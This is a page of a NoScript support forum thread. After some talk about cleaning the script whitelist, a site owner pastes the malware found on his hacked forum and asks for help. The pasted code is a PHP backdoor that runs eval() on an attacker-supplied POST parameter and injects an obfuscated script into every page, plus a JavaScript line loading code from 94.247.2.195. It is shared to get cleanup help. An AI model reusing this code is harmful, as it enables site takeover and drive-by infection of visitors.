InformAction Forums

NoScripters and WebSec nerds of all lands, unite!
https://forums.informaction.com/

94.247.2.195

https://forums.informaction.com/viewtopic.php?t=710

Page 2 of 2

Re: 94.247.2.195

Posted: Sun Apr 26, 2009 5:55 pm
by informactive
I did what you suggested and everything appears to be working OK.

Another question.

NoScript, options, white list.

Would it be a good idea or can't hurt to go through list every so often to remove sites I might never to back and visit?

And reason being just to clean up list a bit.

Or on sites I haven't been to in over say some predetermine time automatically deleted or text turns red.

thanks

Re: 94.247.2.195

Posted: Sun Apr 26, 2009 6:25 pm
by Alan Baxter
informactive wrote:Would it be a good idea or can't hurt to go through list every so often to remove sites I might never to back and visit?
It's not necessary but can't hurt. I do that occasionally during my OCD moments. Sometimes I accidentally remove a needed third-party helper site, but it's easily whitelisted again when its needed.

Re: 94.247.2.195

Posted: Sun Apr 26, 2009 6:56 pm
by informactive
OK.

It would be nice of NoScript knew when I was going to have an OCD moment and do it for me with a single check box however I'll do in my OCD moments.

Re: 94.247.2.195

Posted: Sun Apr 26, 2009 11:39 pm
by GµårÐïåñ
Well it seems like I missed all the action on this one, go figure, but it seems you resolved it and it was already suggested that you got injected. So good luck and now maybe I will get the followup posts.

Re: 94.247.2.195

Posted: Tue Apr 28, 2009 11:19 am
by petricamoise
I also have my forum infected http://wisebets.org .
I got some help from my hosting company, and they found the code in the following files:

Code: Select all

config.php:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdPWFElM0NzSXB2Y3J6WUZpcHpZRnQlMjBzcjZ2R2MlM0QlMkYlMkY5NCUyRTI0ellGNyUyRW1zbzJJcHYlMkUxOTVuMyUyRk9YUWpJcHZxdWVyeSUyRWpzbXNvJTNFJTNDNnZHJTJGc0lwdmNyaXB0bGklM0UnKS5yZXBsYWNlKC9saXxhUXw2dkd8ellGfE9YUXxtc298RGZ8bjN8SXB2L2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php

index.php:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdPWFElM0NzSXB2Y3J6WUZpcHpZRnQlMjBzcjZ2R2MlM0QlMkYlMkY5NCUyRTI0ellGNyUyRW1zbzJJcHYlMkUxOTVuMyUyRk9YUWpJcHZxdWVyeSUyRWpzbXNvJTNFJTNDNnZHJTJGc0lwdmNyaXB0bGklM0UnKS5yZXBsYWNlKC9saXxhUXw2dkd8ellGfE9YUXxtc298RGZ8bjN8SXB2L2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php

postinfo.html:

document.write(unescape('OXQ%3CsIpvcrzYFipzYFt%20sr6vGc%3D%2F%2F94%2E24zYF7%2Emso2Ipv%2E195n3%2FOXQjIpvquery%2Ejsmso%3E%3C6vG%2FsIpvcriptli%3E').replace(/li|aQ|6vG|zYF|OXQ|mso|Df|n3|Ipv/g,""));
_vti_inf.html:document.write(unescape('OXQ%3CsIpvcrzYFipzYFt%20sr6vGc%3D%2F%2F94%2E24zYF7%2Emso2Ipv%2E195n3%2FOXQjIpvquery%2Ejsmso%3E%3C6vG%2FsIpvcriptli%3E').replace(/li|aQ|6vG|zYF|OXQ|mso|Df|n3|Ipv/g,""));
Also I found the following code in almost all my files:

Code: Select all

<script language=javascript><!-- document.write(unescape('OXQ%3CsIpvcrzYFipzYFt%20sr6vGc%3D%2F%2F94%2E24zYF7%2Emso2Ipv%2E195n3%2FOXQjIpvquery%2Ejsmso%3E%3C6vG%2FsIpvcriptli%3E').replace(/li|aQ|6vG|zYF|OXQ|mso|Df|n3|Ipv/g,"")); -->
I removed it manually from all I could find, and now the forum is working fine except the posting part. When I try to post on the forum it`s getting slow and tries to connect to 94.247.2.195 (before I removed the code it was trying to connect to this IP from anypage) . But I already searched the code in ALL files (manually) and cound`t find it anymore, even if it`s still there.

Any ideas where it may be ?
Also, anyone has a suggestion of how to protect against it so that won`t happen again ?

Thanks in advance.

Re: 94.247.2.195

Posted: Tue Apr 28, 2009 1:49 pm
by therube
Again. First you have to determine if it is your website or host that is (initially) being exploited.
The .php - who is responsible for that? You or your host. If you, fix it. If your hosting company, have them fix it.

noscript, 94.247.2.195 and malwarebytes

Has my website been hacked?

Re: 94.247.2.195

Posted: Tue Apr 28, 2009 10:27 pm
by GµårÐïåñ
There might be an import reference to an external file, check all your imports and links in the documents to external JS.
All times are UTC
Page 2 of 2

Powered by phpBB® Forum Software © phpBB Limited